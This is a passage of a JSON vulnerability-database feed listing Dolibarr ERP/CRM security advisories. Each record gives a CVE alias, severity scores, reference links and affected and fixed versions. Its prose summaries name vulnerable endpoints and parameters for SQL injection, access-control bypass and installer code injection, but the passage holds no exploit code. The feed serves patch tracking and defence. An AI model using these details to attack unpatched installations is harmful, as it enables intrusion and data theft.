,{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzv
h-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.2"}],"aliases":["CVE-2024-5315","GHSA-q8x7-jc3h-p8xc"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-m2e3-q7zb-uuhh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/60595?format=json","vulnerability_id":"VCID-ng17-k6q4-qfhe","summary":"Dolibarr SQL injection vulnerability in accountancy/customer/card.php\nA SQL injection vulnerability in accountancy/customer/card.php in Dolibarr 11.0.4 and below allows remote authenticated users to execute arbitrary SQL commands via the id parameter.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-14443","reference_id":"","reference_type":"","scores":[{"value":"0.00295","scoring_system":"epss","scoring_elements":"0.5306","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-14443"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/40e16672e3aa4e9208ea7a4829f30507dcdfc4ba","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dol
ibarr/commit/40e16672e3aa4e9208ea7a4829f30507dcdfc4ba"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14443","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14443"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/75137?format=json","purl":"pkg:composer/dolibarr/dolibarr@11.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-8kn4-yfnc-sfaw"},{"vulnerability":"VCID-8q73-qf6x-zyde"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-ssn5-ht3p-3kgh"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nud
u"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.4"},{"url":"http://public2.vulnerablecode.io/api/packages/100581?format=json","purl":"pkg:composer/dolibarr/dolibarr@11.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.5"}],"aliases":["CVE-2020-144
43","GHSA-8v7v-6mmm-xjxm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ng17-k6q4-qfhe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49306?format=json","vulnerability_id":"VCID-q3dz-magb-4kd5","summary":"Access Control vulnerability in Dolibarr\nAn Access Control vulnerability exists in Dolibarr ERP/CRM 13.0.2, fixed version is 14.0.1, in the forgot-password function because the application allows email addresses as usernames, which can cause a Denial of Service.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-37517","reference_id":"","reference_type":"","scores":[{"value":"0.00356","scoring_system":"epss","scoring_elements":"0.58155","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-37517"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/b57eb8284e830e30eefb26e3c5ede076ea24037c","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/b57eb8284e830e30eefb26e3c5ede076ea24037c"},{"reference_url":"https://github.com/Dolibarr/dolibarr/releases/tag/14.0.1","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/doli
barr/releases/tag/14.0.1"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37517","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37517"},{"reference_url":"https://github.com/advisories/GHSA-xw7v-qrhc-jjg2","reference_id":"GHSA-xw7v-qrhc-jjg2","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xw7v-qrhc-jjg2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/85235?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}
],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.1"}],"aliases":["CVE-2021-37517","GHSA-xw7v-qrhc-jjg2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-q3dz-magb-4kd5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49784?format=json","vulnerability_id":"VCID-qdmw-vqe3-7kfk","summary":"Logic error in dolibarr\nThe application does not check the input of price number lead to Business Logic error through negative price amount.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0174","reference_id":"","reference_type":"","scores":[{"value":"0.00244","scoring_system":"epss","scoring_elements":"0.47797","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0174"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/d892160f4f130385a3ce520f66cb8cf2eb8c5c32","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/d892160f4f130385a3ce520f66cb8cf2eb8c5c32"},{"reference_url":"https://huntr.dev/bounties/ed3ed4ce-3968-433c-a350-351c8f8b60db","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://hunt
r.dev/bounties/ed3ed4ce-3968-433c-a350-351c8f8b60db"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0174","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0174"},{"reference_url":"https://github.com/advisories/GHSA-8qvx-f5gf-g43v","reference_id":"GHSA-8qvx-f5gf-g43v","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8qvx-f5gf-g43v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/36973?format=json","purl":"pkg:composer/dolibarr/dolibarr@15.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0"}],"aliases":["CVE-2022-0174","GHSA-8qvx-f5gf-g43v"],"risk_score":nul
l,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qdmw-vqe3-7kfk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50547?format=json","vulnerability_id":"VCID-rhud-xhwf-mqew","summary":"Improper Authorization in dolibarr/dolibarr\nDolibarr allows improper access control issues in the userphoto modulepart. The impact could lead to data exposure as the attached files and documents may contain sensitive information of relevant parties such as contacts, suppliers, invoices, orders, stocks, agenda, accounting and more.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0731","reference_id":"","reference_type":"","scores":[{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33106","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0731"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/209ab708d4b65fbd88ba4340d60b7822cb72651a","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/209ab708d4b65fbd88ba4340d60b7822cb72651a"},{"reference_url":"https://huntr.dev/bounties/e242ab4e-fc70-4b2c-a42d-5b3ee4895de8","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":
""}],"url":"https://huntr.dev/bounties/e242ab4e-fc70-4b2c-a42d-5b3ee4895de8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0731","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0731"},{"reference_url":"https://github.com/advisories/GHSA-4xc7-x2jr-cr74","reference_id":"GHSA-4xc7-x2jr-cr74","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4xc7-x2jr-cr74"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/86726?format=json","purl":"pkg:composer/dolibarr/dolibarr@16.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5r6g-nb9m-43h1"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0"}],"aliases":["CVE-2022-0731","GHSA-4xc7-x2jr-cr74"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rhud-xhwf-mqew"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/8686?format=json","vulnerability_id":"VCID-s6he-mw9s-nbba","summary":"Dolibarr ERP CRM Code Injection vulnerability during installation\nLack of sanitization during Installation Process in Dolibarr ERP CRM up to version 19.0.0 allows an attacker with adjacent access to the network to execute arbitrary code via a specifically crafted 
input.","references":[{"reference_url":"http://dolibarr.com","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-03T14:57:17Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-29477","reference_id":"","reference_type":"","scores":[{"value":"0.00165","scoring_system":"epss","scoring_elements":"0.37227","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-29477"},{"reference_url":"https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-29477.md","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-03T14:57:17Z/"}],"url":"https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-29477.md"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29477","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":
"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29477"},{"reference_url":"https://github.com/advisories/GHSA-p73x-rpgm-3v56","reference_id":"GHSA-p73x-rpgm-3v56","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p73x-rpgm-3v56"}],"fixed_packages":[],"aliases":["CVE-2024-29477","GHSA-p73x-rpgm-3v56"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-s6he-mw9s-nbba"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/12695?format=json","vulnerability_id":"VCID-s6v7-8pq8-nyez","summary":"Improper Authorization in dolibarr/dolibarr\nAn Improper Authorization vulnerability exists in Dolibarr versions prior to version 15.0.0. A user with restricted permissions in the 'Reception' section is able to access specific reception details via direct URL access, bypassing the intended permission 
restrictions.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-3991","reference_id":"","reference_type":"","scores":[{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.16393","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-3991"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/63cd06394f39d60784d6e6a0ccf4867a71a6568f","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T18:23:55Z/"}],"url":"https://github.com/dolibarr/dolibarr/commit/63cd06394f39d60784d6e6a0ccf4867a71a6568f"},{"reference_url":"https://huntr.com/bounties/58ddbd8a-0faf-4b3f-aec9-5850bb19ab67","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T18:23:55Z/"}],"url":"https://huntr.com/bounties/58ddbd8a-0faf-4b3f-aec9-5850bb19ab67"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE
-2021-3991","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-3991"},{"reference_url":"https://github.com/advisories/GHSA-wppr-j57c-8jpm","reference_id":"GHSA-wppr-j57c-8jpm","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-wppr-j57c-8jpm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/36973?format=json","purl":"pkg:composer/dolibarr/dolibarr@15.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0"}],"aliases":["CVE-2021-3991","GHSA-wppr-j57c-8jpm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-s6v7-8pq8-nyez"},{"url":"http://public2.vulnerablecode.io/api/
vulnerabilities/56671?format=json","vulnerability_id":"VCID-s9rz-z4dd-rkhm","summary":"Incorrect Authorization in Dolibarr\ncore/get_menudiv.php in Dolibarr before 11.0.4 allows remote authenticated attackers to bypass intended access restrictions via a non-alphanumeric menu parameter.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-12669","reference_id":"","reference_type":"","scores":[{"value":"0.00289","scoring_system":"epss","scoring_elements":"0.52542","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-12669"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/c1b530f58f6f01081ddbeaa2092ef308c3ec2727","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"val